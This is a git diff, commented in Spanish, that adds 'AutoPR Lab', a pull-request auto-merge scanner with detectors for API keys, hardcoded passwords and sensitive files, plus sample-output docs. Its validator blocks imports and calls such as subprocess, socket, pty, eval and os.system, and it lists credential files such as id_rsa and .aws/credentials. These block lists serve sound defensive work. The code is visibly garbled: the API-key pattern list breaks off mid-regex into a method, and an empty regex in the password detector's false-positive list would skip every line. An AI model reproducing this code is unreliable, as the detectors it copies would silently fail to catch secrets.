+@dataclass +class ScanResult: + """Resultado completo del análisis de un PR.""" + + # Estado global del PR + global_status: str # "OK" | "WARNING" | "ERROR" + decision: str # "MERGE" | "WARN_MERGE" | "REJECT" + + # Métricas del PR + pr_number: int + files_analyzed: int + total_findings: int + errors: int + warnings: int + ok_count: int + + # Resultados por archivo + findings: list[dict[str, Any]] = field(default_factory=list) + + # Metadata + scan_duration_ms: float = 0.0 + detectors_run: list[str] = field(default_factory=list) + timestamp: str = "" + + # Validación de seguridad del PR (path rules) + path_validation: dict[str, Any] = field(default_factory=dict) + + def to_dict(self) -> dict[str, Any]: + return asdict(self) + + def to_json(self, indent: int = 2) -> str: + return json.dumps(self.to_dict(), indent=indent, ensure_ascii=False) + + +class SecurityRules: + """ + Reglas de seguridad para el auto-merge. + Define qué archivos y condiciones son aceptables para merge automático. + """ + + # Paths permitidos para auto-merge (solo estos) + ALLOWED_PATHS = [ + "detectors/", + "tests/", + "docs/", + "examples/", + "README.md", + "CHANGELOG.md", + ".github/ISSUE_TEMPLATE/", + ] + + # Paths SIEMPRE prohibidos (bloquean el merge aunque todo lo demás sea OK) + FORBIDDEN_PATHS = [ + "core/", + ".github/workflows/", + "scripts/", + "requirements.txt", + "setup.py", + "setup.cfg", + "pyproject.toml", + "Makefile", + ".gitignore", + ] + + # Límites cuantitativos + MAX_FILES = 10 + MAX_LINES_CHANGED = 500 + + @classmethod + def validate_paths(cls, changed_files: list[str]) -> tuple[bool, list[str]]: + """ + Valida que todos los archivos modificados están en paths permitidos. + + Returns: + (is_valid, list_of_violations) + """ + violations = [] + + for file_path in changed_files: + # Verificar si está en paths prohibidos (prioridad máxima) + is_forbidden = any( + file_path.startswith(forbidden) or file_path == forbidden + for forbidden in cls.FORBIDDEN_PATHS + ) + if is_forbidden: + violations.append( + f"🚫 PROHIBIDO: `{file_path}` (ruta crítica del sistema)" + ) + continue + + # Verificar si está en paths permitidos + is_allowed = any( + file_path.startswith(allowed) or file_path == allowed + for allowed in cls.ALLOWED_PATHS + ) + if not is_allowed: + violations.append( + f"❌ NO PERMITIDO: `{file_path}` " + f"(solo se permite modificar: {', '.join(cls.ALLOWED_PATHS)})" + ) + + return len(violations) == 0, violations + + @classmethod + def validate_size( + cls, num_files: int, lines_changed: int + ) -> tuple[bool, list[str]]: + """Valida que el PR no es demasiado grande.""" + violations = [] + + if num_files > cls.MAX_FILES: + violations.append( + f"El PR modifica {num_files} archivos (máximo permitido: {cls.MAX_FILES})" + ) + + if lines_changed > cls.MAX_LINES_CHANGED: + violations.append( + f"El PR tiene {lines_changed} líneas cambiadas (máximo permitido: {cls.MAX_LINES_CHANGED})" + ) + + return len(violations) == 0, violations + + +class Scanner: + """ + Motor principal de escaneo de PRs. + """ + + def __init__(self) -> None: + self.detector_classes = discover_detectors() + self.detectors = [cls() for cls in self.detector_classes] + logger.info( + f"Scanner inicializado con {len(self.detectors)} detectores: " + f"{[d.name for d in self.detectors]}" + ) + + def scan_file(self, file_path: str, content: str) -> list[DetectorResult]: + """Ejecuta todos los detectores sobre un archivo.""" + all_results = [] + + for detector in self.detectors: + try: + if not detector.should_skip(file_path): + results = detector.analyze(file_path, content) + all_results.extend(results) + logger.debug( + f" {detector.name}: {len(results)} findings en {file_path}" + ) + except Exception as e: + logger.error( + f"Error en detector {detector.name} analizando {file_path}: {e}" + ) + all_results.append( + DetectorResult( + status=DetectorStatus.WARNING, + detector_name=detector.name, + message=f"Error interno del detector: {str(e)}", + file_path=file_path, + ) + ) + + return all_results + + def scan_pr( + self, + pr_number: int, + changed_files: dict[str, str], # {file_path: content} + lines_changed: int = 0, + ) -> ScanResult: + """ + Analiza todos los archivos de un PR y genera el resultado global. + + Args: + pr_number: Número del PR en GitHub + changed_files: Diccionario {ruta_archivo: contenido} + lines_changed: Total de líneas modificadas + """ + start_time = time.time() + logger.info(f"🔍 Iniciando análisis del PR #{pr_number}") + logger.info(f" Archivos a analizar: {len(changed_files)}") + + all_findings = [] + + # ── 1. Validación de paths (seguridad del sistema) ── + path_ok, path_violations = SecurityRules.validate_paths( + list(changed_files.keys()) + ) + size_ok, size_violations = SecurityRules.validate_size( + len(changed_files), lines_changed + ) + + path_validation = { + "paths_ok": path_ok, + "size_ok": size_ok, + "violations": path_violations + size_violations, + } + + if path_violations: + logger.warning(f" ⚠️ Violaciones de paths: {path_violations}") + + # ── 2. Análisis de contenido con detectores ── + for file_path, content in changed_files.items(): + logger.info(f" Analizando: {file_path}") + file_results = self.scan_file(file_path, content) + + if file_results: + for r in file_results: + all_findings.append(r.to_dict()) + level = r.status.value + logger.info(f" [{level}] {r.detector_name}: {r.message}") + + # ── 3. Calcular métricas ── + errors = sum(1 for f in all_findings if f["status"] == "ERROR") + warnings = sum(1 for f in all_findings if f["status"] == "WARNING") + ok_count = sum(1 for f in all_findings if f["status"] == "OK") + + # ── 4. Determinar estado global y decisión ── + has_path_violations = not path_ok or not size_ok + + if has_path_violations or errors > 0: + global_status = "ERROR" + decision = "REJECT" + elif warnings > 0: + global_status = "WARNING" + decision = "WARN_MERGE" + else: + global_status = "OK" + decision = "MERGE" + + duration_ms = (time.time() - start_time) * 1000 + + result = ScanResult( + global_status=global_status, + decision=decision, + pr_number=pr_number, + files_analyzed=len(changed_files), + total_findings=len(all_findings), + errors=errors, + warnings=warnings, + ok_count=ok_count, + findings=all_findings, + scan_duration_ms=round(duration_ms, 2), + detectors_run=[d.name for d in self.detectors], + timestamp=time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime()), + path_validation=path_validation, + ) + + logger.info(f"✅ Análisis completado en {duration_ms:.0f}ms") + logger.info(f" Estado: {global_status} | Decisión: {decision}") + logger.info(f" Errores: {errors} | Advertencias: {warnings} | OK: {ok_count}") + + return result diff --git a/detectors/__init__.py b/detectors/__init__.py new file mode 100644 index 0000000..215bb2d --- /dev/null +++ b/detectors/__init__.py @@ -0,0 +1,44 @@ +""" +AutoPR Lab - Detectors Package +================================ +Auto-descubrimiento de detectores. +Cualquier clase que herede de BaseDetector es registrada automáticamente. +""" + +import importlib +import inspect +import os + +from detectors.base_detector import BaseDetector + + +def discover_detectors() -> list[type[BaseDetector]]: + """ + Descubre automáticamente todos los detectores en este paquete. + No necesitas registrarlos manualmente. + """ + detectors = [] + detectors_dir = os.path.dirname(__file__) + + for filename in sorted(os.listdir(detectors_dir)): + if filename.endswith(".py") and filename not in ( + "__init__.py", + "base_detector.py", + ): + module_name = filename[:-3] # quitar .py + try: + module = importlib.import_module(f"detectors.{module_name}") + for _name, obj in inspect.getmembers(module, inspect.isclass): + if ( + issubclass(obj, BaseDetector) + and obj is not BaseDetector + and obj.__module__ == module.__name__ + ): + detectors.append(obj) + except ImportError as e: + print(f"[WARN] No se pudo cargar detector {module_name}: {e}") + + return detectors + + +__all__ = ["BaseDetector", "discover_detectors"] diff --git a/detectors/api_keys_detector.py b/detectors/api_keys_detector.py new file mode 100644 index 0000000..3c34637 --- /dev/null +++ b/detectors/api_keys_detector.py @@ -0,0 +1,170 @@ +""" +AutoPR Lab - API Keys Detector +================================ +Detecta API keys, tokens y credenciales expuestas en el código fuente. +""" + +import re + +from detectors.base_detector import BaseDetector, DetectorResult, DetectorStatus + + +class APIKeysDetector(BaseDetector): + """ + Detecta patrones conocidos de API keys y tokens en el código. + Cubre: AWS, GCP, GitHub, Stripe, Twilio, OpenAI, HuggingFace, etc. + """ + + # Formato: (nombre_servicio, regex_pattern) + PATTERNS = [ + # AWS + ("AWS Access Key", r"(? str: + return "APIKeysDetector" + + @property + def description(self) -> str: + return ( + "Detecta API keys, tokens y credenciales hardcodeadas en el código fuente" + ) + + @property + def severity(self) -> str: + return "critical" + + def should_skip(self, file_path: str) -> bool: + if super().should_skip(file_path): + return True + # Ignorar archivos de lock y dependencias + skip_paths = ["package-lock.json", "yarn.lock", "poetry.lock", "Pipfile.lock"] + return any(skip in file_path for skip in skip_paths) + + def _is_safe_line(self, line: str) -> bool: + """Verifica si una línea coincide con patrones seguros (falsos positivos).""" + for safe_pattern in self.SAFE_PATTERNS: + if re.search(safe_pattern, line, re.IGNORECASE): + return True + return False + + def analyze(self, file_path: str, content: str) -> list[DetectorResult]: + if self.should_skip(file_path): + return [] + + results = [] + lines = content.splitlines() + + for line_num, line in enumerate(lines, start=1): + if self._is_safe_line(line): + continue + + for service_name, pattern in self.PATTERNS: + match = re.search(pattern, line) + if match: + # Ocultar el valor real en el reporte + detected_value = match.group(0) + masked = self._mask_secret(detected_value) + + results.append( + DetectorResult( + status=DetectorStatus.ERROR, + detector_name=self.name, + message=f"Posible {service_name} detectado", + details=[ + f"Patrón detectado: `{masked}`", + f"Línea completa: `{line.strip()[:80]}...`" + if len(line) > 80 + else f"Línea: `{line.strip()}`", + "⚠️ Nunca hardcodees credenciales. Usa variables de entorno o un secrets manager.", + ], + file_path=file_path, + line_number=line_num, + ) + ) + break # Un problema por línea es suficiente + + return results + + def _mask_secret(self, secret: str) -> str: + """Enmascara un secreto para el reporte (muestra solo inicio y fin).""" + if len(secret) <= 8: + return "*" * len(secret) + visible = 4 + return secret[:visible] + "*" * (len(secret) - visible * 2) + secret[-visible:] diff --git a/detectors/base_detector.py b/detectors/base_detector.py new file mode 100644 index 0000000..cea7a5a --- /dev/null +++ b/detectors/base_detector.py @@ -0,0 +1,110 @@ +""" +AutoPR Lab - Base Detector +========================== +Clase base para todos los detectores del sistema. +Todo detector nuevo DEBE heredar de esta clase. +""" + +from abc import ABC, abstractmethod +from dataclasses import dataclass, field +from enum import StrEnum +from typing import Any + + +class DetectorStatus(StrEnum): + OK = "OK" + WARNING = "WARNING" + ERROR = "ERROR" + + +@dataclass +class DetectorResult: + """Resultado estándar de un detector.""" + + status: DetectorStatus + detector_name: str + message: str + details: list[str] = field(default_factory=list) + file_path: str | None = None + line_number: int | None = None + + def to_dict(self) -> dict[str, Any]: + return { + "status": self.status.value, + "detector_name": self.detector_name, + "message": self.message, + "details": self.details, + "file_path": self.file_path, + "line_number": self.line_number, + } + + def __str__(self) -> str: + icon_map: dict[str, str] = {"OK": "✅", "WARNING": "⚠️", "ERROR": "❌"} + icon = icon_map.get(self.status.value, "?") + base = f"{icon} [{self.status.value}] {self.detector_name}: {self.message}" + if self.file_path: + base += f" (file: {self.file_path}" + if self.line_number: + base += f", line: {self.line_number}" + base += ")" + return base + + +class BaseDetector(ABC): + """ + Clase base abstracta para todos los detectores de AutoPR Lab. + + Para agregar un detector nuevo: + 1. Crea un archivo en /detectors/mi_detector.py + 2. Hereda de BaseDetector + 3. Implementa el método `analyze` + 4. El sistema lo detectará automáticamente + + Ver: docs/how-to-add-detector.md + """ + + @property + @abstractmethod + def name(self) -> str: + """Nombre único del detector (usado en reportes).""" + raise NotImplementedError + + @property + @abstractmethod + def description(self) -> str: + """Descripción breve de qué analiza este detector.""" + raise NotImplementedError + + @property + def severity(self) -> str: + """Nivel de severidad por defecto: 'critical', 'high', 'medium', 'low'.""" + return "high" + + @abstractmethod + def analyze(self, file_path: str, content: str) -> list[DetectorResult]: + """ + Analiza el contenido de un archivo. + ... + """ + raise NotImplementedError + + def should_skip(self, file_path: str) -> bool: + """ + Define si este detector debe ignorar un archivo. + Override para personalizar (ej: ignorar archivos de tests). + """ + skip_extensions = { + ".png", + ".jpg", + ".jpeg", + ".gif", + ".ico", + ".svg", + ".pdf", + ".zip", + ".tar", + ".gz", + ".bin", + ".lock", + } + return any(file_path.endswith(ext) for ext in skip_extensions) diff --git a/detectors/detector_validator.py b/detectors/detector_validator.py new file mode 100644 index 0000000..bf3f9e8 --- /dev/null +++ b/detectors/detector_validator.py @@ -0,0 +1,256 @@ +""" +AutoPR Lab - Detector Format Validator +======================================== +Valida que los detectores nuevos cumplan con la estructura requerida. +Protección contra contribuciones maliciosas o mal formadas. +""" + +import ast +import os + +from detectors.base_detector import BaseDetector, DetectorResult, DetectorStatus + + +class DetectorFormatValidator(BaseDetector): + """ + Valida la estructura y seguridad de los detectores nuevos en el PR. + Este detector es especial: analiza código Python de otros detectores. + """ + + # Imports prohibidos en detectores (podrían ejecutar código arbitrario o red) + FORBIDDEN_IMPORTS = { + "subprocess", + "os.system", + "eval", + "exec", + "importlib", + "pty", + "pexpect", + "socket", + "requests", + "urllib", + "http.client", + "ftplib", + "smtplib", + "poplib", + "ctypes", + "cffi", + "sys", + "shutil", + "posix", + "__import__", + "pickle", + "marshal", + "shelve", + } + + # Funciones peligrosas (built-ins y de módulos comunes) + FORBIDDEN_FUNCTIONS = { + "eval", + "exec", + "compile", + "__import__", + "open", + "system", + "popen", + "spawnl", + "spawnv", + "spawnlp", + "spawnvp", + "execl", + "execv", + "execle", + "execve", + "execlp", + "execvp", + "run", + "call", + "check_call", + "check_output", + "getstatusoutput", + "getoutput", + } + + # Atributos requeridos en todo detector + REQUIRED_PROPERTIES = {"name", "description", "severity", "analyze"} + + @property + def name(self) -> str: + return "DetectorFormatValidator" + + @property + def description(self) -> str: + return "Valida que los detectores nuevos siguen la estructura requerida y no contienen código peligroso" + + @property + def severity(self) -> str: + return "critical" + + def should_skip(self, file_path: str) -> bool: + # Solo analizar archivos Python en /detectors/ + if not file_path.endswith(".py"): + return True + if "detectors/" not in file_path and "detectors\\" not in file_path: + return True + # No analizarse a sí mismo ni al base + filename = os.path.basename(file_path) + if filename in ("base_detector.py", "detector_validator.py", "__init__.py"): + return True + return False + + def _check_forbidden_imports( + self, tree: ast.AST, file_path: str + ) -> list[DetectorResult]: + results = [] + for node in ast.walk(tree): + if isinstance(node, (ast.Import, ast.ImportFrom)): + if isinstance(node, ast.Import): + modules = [alias.name for alias in node.names] + else: + modules = [node.module] if node.module else [] + + for module in modules: + if module and any( + module.startswith(forbidden) + for forbidden in self.FORBIDDEN_IMPORTS + ): + results.append( + DetectorResult( + status=DetectorStatus.ERROR, + detector_name=self.name, + message=f"Import prohibido en detector: `{module}`", + details=[ + "Los detectores no pueden importar módulos de red o ejecución de código.", + f"Módulo bloqueado: `{module}`", + "Los detectores solo pueden usar: re, os.path, typing, y módulos estándar seguros.", + ], + file_path=file_path, + line_number=node.lineno, + ) + ) + return results + + def _check_forbidden_calls( + self, tree: ast.AST, file_path: str + ) -> list[DetectorResult]: + results = [] + for node in ast.walk(tree): + if isinstance(node, ast.Call): + func_name = None + if isinstance(node.func, ast.Name): + func_name = node.func.id + elif isinstance(node.func, ast.Attribute): + func_name = node.func.attr + + if func_name and func_name in self.FORBIDDEN_FUNCTIONS: + results.append( + DetectorResult( + status=DetectorStatus.ERROR, + detector_name=self.name, + message=f"Función peligrosa en detector: `{func_name}()`", + details=[ + f"`{func_name}()` puede ejecutar código arbitrario o acceder al sistema y está prohibida.", + "Los detectores solo deben analizar texto, no ejecutar código ni realizar operaciones de sistema.", + ], + file_path=file_path, + line_number=getattr(node, "lineno", None), + ) + ) + return results + + def _check_inherits_base( + self, tree: ast.AST, file_path: str + ) -> list[DetectorResult]: + results = [] + found_detector_class = False + + for node in ast.walk(tree): + if isinstance(node, ast.ClassDef): + base_names = [] + for base in node.bases: + if isinstance(base, ast.Name): + base_names.append(base.id) + elif isinstance(base, ast.Attribute): + base_names.append(base.attr) + + if "BaseDetector" in base_names: + found_detector_class = True + + # Verificar que implementa los métodos requeridos + implemented = set() + for item in node.body: + if isinstance(item, (ast.FunctionDef, ast.AsyncFunctionDef)): + implemented.add(item.name) + + missing = self.REQUIRED_PROPERTIES - implemented + if missing: + results.append( + DetectorResult( + status=DetectorStatus.ERROR, + detector_name=self.name, + message=f"Detector `{node.name}` no implementa métodos requeridos", + details=[ + f"Métodos/propiedades faltantes: {', '.join(f'`{m}`' for m in missing)}", + "Todo detector debe implementar: `name`, `description`, `severity`, `analyze`", + ], + file_path=file_path, + line_number=node.lineno, + ) + ) + + if not found_detector_class: + results.append( + DetectorResult( + status=DetectorStatus.ERROR, + detector_name=self.name, + message="El archivo no contiene ninguna clase que herede de `BaseDetector`", + details=[ + "Los detectores deben heredar de `BaseDetector`.", + "Ejemplo: `class MyDetector(BaseDetector):`", + "Ver: docs/how-to-add-detector.md", + ], + file_path=file_path, + ) + ) + + return results + + def analyze(self, file_path: str, content: str) -> list[DetectorResult]: + if self.should_skip(file_path): + return [] + + results = [] + + # Intentar parsear el AST + try: + tree = ast.parse(content) + except SyntaxError as e: + return [ + DetectorResult( + status=DetectorStatus.ERROR, + detector_name=self.name, + message=f"Error de sintaxis en el detector: {e.msg}", + details=[f"Línea {e.lineno}: {e.text}"], + file_path=file_path, + line_number=e.lineno, + ) + ] + + results.extend(self._check_forbidden_imports(tree, file_path)) + results.extend(self._check_forbidden_calls(tree, file_path)) + results.extend(self._check_inherits_base(tree, file_path)) + + if not results: + results.append( + DetectorResult( + status=DetectorStatus.OK, + detector_name=self.name, + message="Estructura del detector válida", + details=[ + "El detector cumple con todos los requisitos de formato y seguridad." + ], + file_path=file_path, + ) + ) + + return results diff --git a/detectors/passwords_detector.py b/detectors/passwords_detector.py new file mode 100644 index 0000000..5a87747 --- /dev/null +++ b/detectors/passwords_detector.py @@ -0,0 +1,165 @@ +""" +AutoPR Lab - Passwords Detector +================================= +Detecta contraseñas hardcodeadas y credenciales inseguras en el código. +""" + +import re + +from detectors.base_detector import BaseDetector, DetectorResult, DetectorStatus + + +class PasswordsDetector(BaseDetector): + """ + Detecta contraseñas y credenciales hardcodeadas en asignaciones directas. + Analiza patrones como: password = "secret123", pwd = "admin" + """ + + # Patrones de asignación de contraseñas + ASSIGNMENT_PATTERNS = [ + # password = "value" en múltiples formatos + ( + r"""(password|passwd|pwd|pass|secret|credential|cred|auth_token|access_token)\s*[:=]\s*['"]([^'"]{4,})['"]""", + "Password hardcodeado", + ), + # En JSON/YAML + ( + r"""['"](password|passwd|pwd|pass|secret|token|api_key|auth)['"]\s*:\s*['"]([^'"]{4,})['"]""", + "Credencial en configuración", + ), + # Conexiones a base de datos + ( + r"""(db_pass|database_password|db_password|mysql_pass|mongo_pass)\s*[:=]\s*['"]([^'"]{4,})['"]""", + "Contraseña de base de datos", + ), + # Tokens en código + ( + r"""(auth_token|access_token|refresh_token|secret_key|signing_key)\s*[:=]\s*['"]([^'"]{8,})['"]""", + "Token de autenticación hardcodeado", + ), + # Variables de entorno hardcodeadas dentro del código (no en .env) + ( + r"""os\.environ\[['"](password|secret|token|key)['"]\]\s*=\s*['"]([^'"]{4,})['"]""", + "Asignación directa de variable de entorno sensible", + ), + ] + + # Contraseñas triviales/débiles que siempre son un error + TRIVIAL_PASSWORDS = { + "password", + "123456", + "12345678", + "qwerty", + "admin", + "root", + "welcome", + "letmein", + "monkey", + "dragon", + "master", + "password1", + "abc123", + "test", + "testing", + "changeme", + "default", + "pass", + "secret", + "1234", + "1111", + "0000", + "admin123", + "pass123", + } + + # Patrones a ignorar (falsos positivos) + FALSE_POSITIVE_PATTERNS = [ + r"^\s*#", # Comentarios + r"^\s*//", # Comentarios JS + r"example\.com", # Ejemplos + r"your[-_]?password", # Instrucciones + r"your[-_]?", # Cualquier YOUR_ prefix + r"", # Placeholders XML + r"\$\{[^}]+\}", # Variables en templates + r"os\.getenv\(", # Lectura de env vars + r"environ\.get\(", # Lectura de env vars + r"process\.env\.", # Node.js env vars + r"getenv\(", # C/PHP getenv + r"config\[", # Acceso a config objects + r"settings\.", # Django settings + r"# noqa", # Exclusiones explícitas + r"# nosec", # Exclusiones de bandit + r"CHANGE_ME", # Placeholder explícito + r"REPLACE_", # Placeholder explícito + r"_HERE", # Placeholder tipo KEY_HERE + r"placeholder", # Palabra placeholder + r"<[A-Z_]+>", # Placeholders tipo + ] + + @property + def name(self) -> str: + return "PasswordsDetector" + + @property + def description(self) -> str: + return "Detecta contraseñas hardcodeadas y credenciales débiles en el código fuente" + + @property + def severity(self) -> str: + return "critical" + + def _is_false_positive(self, line: str) -> bool: + for pattern in self.FALSE_POSITIVE_PATTERNS: + if re.search(pattern, line, re.IGNORECASE): + return True + return False + + def _check_trivial_password(self, value: str) -> bool: + return value.strip().lower() in self.TRIVIAL_PASSWORDS + + def analyze(self, file_path: str, content: str) -> list[DetectorResult]: + if self.should_skip(file_path): + return [] + + results = [] + lines = content.splitlines() + + for line_num, line in enumerate(lines, start=1): + if self._is_false_positive(line): + continue + + for pattern, description in self.ASSIGNMENT_PATTERNS: + match = re.search(pattern, line, re.IGNORECASE) + if match: + groups = match.groups() + variable_name = groups[0] if groups else "unknown" + secret_value = groups[-1] if len(groups) > 1 else "" + + # Verificar si es una contraseña trivial (aún más crítico) + is_trivial = self._check_trivial_password(secret_value) + + status = DetectorStatus.ERROR + details = [ + f"Variable: `{variable_name}`", + f"Valor detectado: `{'*' * len(secret_value)}`", + "🔒 Usa variables de entorno o un secrets manager (Vault, AWS Secrets Manager, etc.)", + ] + + if is_trivial: + details.append( + f"⚠️ CRÍTICO: La contraseña '{secret_value}' es trivialmente débil y conocida" + ) + + results.append( + DetectorResult( + status=status, + detector_name=self.name, + message=f"{description} en variable '{variable_name}'", + details=details, + file_path=file_path, + line_number=line_num, + ) + ) + break + + return results diff --git a/detectors/sensitive_files_detector.py b/detectors/sensitive_files_detector.py new file mode 100644 index 0000000..0553a71 --- /dev/null +++ b/detectors/sensitive_files_detector.py @@ -0,0 +1,253 @@ +""" +AutoPR Lab - Sensitive Files Detector +======================================= +Detecta archivos sensibles incluidos accidentalmente en el PR: +.env, config secrets, private keys, certificados, etc. +""" + +import os +import re + +from detectors.base_detector import BaseDetector, DetectorResult, DetectorStatus + + +class SensitiveFilesDetector(BaseDetector): + """ + Detecta si el PR incluye archivos que NUNCA deberían estar en un repositorio. + Analiza el nombre del archivo y su contenido. + """ + + # Archivos que NUNCA deben aparecer en un PR + FORBIDDEN_FILES = { + # Variables de entorno + ".env", + ".env.local", + ".env.production", + ".env.development", + ".env.staging", + ".env.test", + ".env.backup", + # Configuraciones de secretos + "secrets.yml", + "secrets.yaml", + "secrets.json", + "credentials.json", + "credentials.yml", + "config.secret.yml", + "config.secret.json", + "local_settings.py", # Django + # Claves privadas y certificados + "id_rsa", + "id_dsa", + "id_ecdsa", + "id_ed25519", + "id_rsa.pub", + "id_ecdsa.pub", + "id_ed25519.pub", + "private.key", + "private.pem", + "server.key", + "client.key", + "ca.key", + "*.pfx", + "*.p12", + "keystore.jks", + # Archivos de bases de datos + "*.sqlite", + "*.sqlite3", + "*.db", + "dump.sql", + "backup.sql", + "database.sql", + # Configuración de servicios cloud + ".aws/credentials", + ".aws/config", + "gcloud-key.json", + "service-account.json", + "firebase-adminsdk*.json", + "firebase.json", + "google-services.json", + # Archivos de configuración local de IDEs con datos sensibles + ".idea/workspace.xml", + "*.suo", # Visual Studio + # Terraform state (puede contener secretos) + "terraform.tfstate", + "terraform.tfstate.backup", + "*.tfvars", # Excepto ejemplo: *.tfvars.example + # Archivos de contraseñas + "htpasswd", + ".htpasswd", + "passwd", + "shadow", + } + + # Extensiones siempre prohibidas + FORBIDDEN_EXTENSIONS = { + ".pem", + ".key", + ".pfx", + ".p12", + ".jks", + ".pkcs12", + ".crt", + ".cer", + ".der", + } + + # Patrones en el contenido que indican archivo sensible + SENSITIVE_CONTENT_PATTERNS = [ + (r"-----BEGIN (RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----", "Clave privada PEM"), + (r"-----BEGIN CERTIFICATE-----", "Certificado SSL/TLS"), + (r"-----BEGIN PGP PRIVATE KEY BLOCK-----", "Clave privada PGP"), + # .env con valores reales (no placeholders) + ( + r"(?m)^(export\s+)?[A-Z_]*(PASSWORD|SECRET|TOKEN|KEY|API_KEY)\s*=\s*(?!YOUR_|your_|<|CHANGE_ME|REPLACE|example|placeholder|xxx|none|null|false|true|\$\{)[^\s\$<\"']{6,}", + ".env con valores reales", + ), + (r"\[default\]\s*\naws_access_key_id", "Archivo de credenciales AWS"), + (r'"type"\s*:\s*"service_account"', "Clave de servicio de Google"), + ] + + # Advertencias: archivos que podrían ser sensibles según contexto + WARNING_FILES = { + ".env.example", + ".env.template", + ".env.sample", + "config.example.yml", + "settings.example.py", + } + + @property + def name(self) -> str: + return "SensitiveFilesDetector" + + @property + def description(self) -> str: + return "Detecta archivos sensibles (.env, keys, certificados) que no deben estar en el repositorio" + + @property + def severity(self) -> str: + return "critical" + + def should_skip(self, file_path: str) -> bool: + # Este detector NO omite ningún archivo por extensión + return False + + def _get_filename(self, file_path: str) -> str: + return os.path.basename(file_path).lower() + + def _is_forbidden_file(self, file_path: str) -> bool: + filename = self._get_filename(file_path) + file_path_lower = file_path.lower() + filename_lower = filename.lower() + + # Si está en WARNING_FILES, no es forbidden (tiene su propio tratamiento) + if self._is_warning_file(file_path): + return False + + # Verificar nombre exacto contra la lista de prohibidos + forbidden_lower = {f.lower() for f in self.FORBIDDEN_FILES if "*" not in f} + if filename_lower in forbidden_lower: + return True + + # Verificar rutas específicas con path separator (ej: .aws/credentials) + for forbidden in self.FORBIDDEN_FILES: + if "/" in forbidden and forbidden.lower() in file_path_lower: + return True + + # Verificar extensión + _, ext = os.path.splitext(filename) + if ext in self.FORBIDDEN_EXTENSIONS: + return True + + # Verificar patrones con wildcards + for forbidden in self.FORBIDDEN_FILES: + if "*" in forbidden: + pattern = r"^" + forbidden.replace(".", r"\.").replace("*", ".*") + r"$" + if re.match(pattern, filename, re.IGNORECASE): + return True + + return False + + def _is_warning_file(self, file_path: str) -> bool: + filename = self._get_filename(file_path) + return filename in {f.lower() for f in self.WARNING_FILES} + + def analyze(self, file_path: str, content: str) -> list[DetectorResult]: + results = [] + filename = self._get_filename(file_path) + + # ERROR: Archivo completamente prohibido + if self._is_forbidden_file(file_path): + results.append( + DetectorResult( + status=DetectorStatus.ERROR, + detector_name=self.name, + message=f"Archivo sensible prohibido: `{filename}`", + details=[ + f"Ruta detectada: `{file_path}`", + "🚫 Este tipo de archivo NUNCA debe estar en el repositorio.", + "💡 Agrégalo a .gitignore inmediatamente.", + "🔐 Si ya fue expuesto: rota todas las credenciales involucradas.", + ], + file_path=file_path, + ) + ) + return results + + # WARNING: Archivo de ejemplo/template (puede ser intencional) + if self._is_warning_file(file_path): + # Verificar que no tenga valores reales + has_real_values = any( + re.search(pattern, content, re.MULTILINE | re.IGNORECASE) + for pattern, _ in self.SENSITIVE_CONTENT_PATTERNS + ) + + if has_real_values: + results.append( + DetectorResult( + status=DetectorStatus.ERROR, + detector_name=self.name, + message=f"Archivo de template con valores reales: `{filename}`", + details=[ + "El archivo parece un template (.example/.sample) pero contiene valores reales.", + "Reemplaza los valores reales con placeholders: ${YOUR_SECRET_HERE}", + ], + file_path=file_path, + ) + ) + else: + results.append( + DetectorResult( + status=DetectorStatus.WARNING, + detector_name=self.name, + message=f"Archivo de template detectado: `{filename}`", + details=[ + "Este archivo de ejemplo/template es aceptable si solo contiene placeholders.", + "✅ Asegúrate de que los valores sean ficticios (ej: YOUR_API_KEY_HERE).", + ], + file_path=file_path, + ) + ) + return results + + # Analizar contenido de cualquier archivo + for pattern, description in self.SENSITIVE_CONTENT_PATTERNS: + match = re.search(pattern, content, re.MULTILINE | re.IGNORECASE) + if match: + line_num = content[: match.start()].count("\n") + 1 + results.append( + DetectorResult( + status=DetectorStatus.ERROR, + detector_name=self.name, + message=f"Contenido sensible en `{filename}`: {description}", + details=[ + f"Patrón encontrado en línea {line_num}", + "🔐 El contenido de este archivo no debe estar en el repositorio.", + ], + file_path=file_path, + line_number=line_num, + ) + ) + + return results diff --git a/docs/example-outputs.md b/docs/example-outputs.md new file mode 100644 index 0000000..fc4a9aa --- /dev/null +++ b/docs/example-outputs.md @@ -0,0 +1,190 @@ +# 📊 Ejemplos de Outputs de AutoPR Lab + +Esta página muestra los outputs reales del sistema en distintos escenarios. + +--- + +## Escenario 1: PR Limpio → MERGE ✅ + +**PR:** Agrega `SQLInjectionDetector` con tests + +``` +INFO autopr.scanner | 🔍 Iniciando análisis del PR #42 +INFO autopr.scanner | Archivos a analizar: 2 +INFO autopr.scanner | Analizando: detectors/sql_injection_detector.py +INFO autopr.scanner | [OK] DetectorFormatValidator: Estructura del detector válida +INFO autopr.scanner | Analizando: tests/test_sql_injection_detector.py +INFO autopr.scanner | ✅ Análisis completado en 87ms +INFO autopr.scanner | Estado: OK | Decisión: MERGE +INFO autopr.scanner | Errores: 0 | Advertencias: 0 | OK: 2 +``` + +**Comentario en el PR:** + +--- + +## 🤖 AutoPR Lab — Análisis Completado + +### ✅ DECISIÓN: MERGE AUTOMÁTICO APROBADO + +El PR cumple todos los requisitos de seguridad y calidad. + +| Métrica | Valor | +|---------|-------| +| Archivos analizados | `2` | +| Detectores ejecutados | `4` | +| Errores | `0` | +| Advertencias | `0` | +| Tiempo de análisis | `87ms` | + +### 🔍 Detectores ejecutados +- ✅ `APIKeysDetector` +- ✅ `PasswordsDetector` +- ✅ `SensitiveFilesDetector` +- ✅ `DetectorFormatValidator` + +> 🔀 **Este PR ha sido mergeado automáticamente** por AutoPR Lab. + +--- + +## Escenario 2: PR con Advertencias → WARN_MERGE ⚠️ + +**PR:** Agrega detector con archivo `.env.example` (template) + +``` +INFO autopr.scanner | 🔍 Iniciando análisis del PR #43 +INFO autopr.scanner | Archivos a analizar: 2 +INFO autopr.scanner | Analizando: detectors/new_detector.py +INFO autopr.scanner | [OK] DetectorFormatValidator: Estructura del detector válida +INFO autopr.scanner | Analizando: .env.example +INFO autopr.scanner | [WARNING] SensitiveFilesDetector: Archivo de template detectado +INFO autopr.scanner | ✅ Análisis completado en 102ms +INFO autopr.scanner | Estado: WARNING | Decisión: WARN_MERGE +INFO autopr.scanner | Errores: 0 | Advertencias: 1 | OK: 1 +``` + +**Comentario en el PR:** + +--- + +## 🤖 AutoPR Lab — Análisis Completado + +### ⚠️ DECISIÓN: MERGE CON ADVERTENCIAS + +**⚠️ 